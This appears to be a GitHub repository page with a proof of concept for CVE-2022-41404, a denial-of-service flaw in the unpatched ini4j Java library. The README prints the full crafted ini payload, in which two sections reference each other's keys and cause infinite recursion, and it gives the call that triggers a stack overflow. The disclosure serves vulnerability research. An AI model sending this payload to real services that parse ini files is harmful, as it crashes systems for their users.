Skip to content

veracode/ini4j_unpatched_DoS

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
src/main/java/org/ini4jTest
src/main/java/org/ini4jTest
 
 
.gitignore
.gitignore
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
pom.xml
pom.xml
 
 

Repository files navigation

Unpatched ini4j DoS vulnerability CVE-2022-41404

A CVE was submitted to NVD on 10/11/2022, claiming that ini4j prior to 0.5.4 is vulnerable to a DoS attack. The ini file payload is

[sectionOne]
weight = ${sectionTwo/weight}
height = ${doc/height}

[sectionTwo]
weight = ${sectionOne/weight}
height = ${sectionOne/height}

[doc]
weight = 49.5
height = 87.7

If you take a look at sectionOne, you can note that the weight key references the sectionTwo weight key, and then references the sectionOne weight key. This infinite lookup loop results in Denial of Service. This type of DoS can be described as a Billion Laugh attack

It turns out that 0.5.4 hasn't been updated since 2015, and there is no fixed version.

How to run the PoC

  1. Install the ini4j dependency using maven
  2. Run the main class in Main.java
  3. When trying to fetch the weight key in sectionOne, a StackOverFlow Exception is raised, resulting in DoS
    • ini.get("sectionOne").fetch("weight");

About

Ini4j unpatched DoS vulnerability PoC

Resources

Readme

License

MIT license
Activity
Custom properties

Stars

1 star

Watchers

4 watching

Forks

2 forks
Report repository

Languages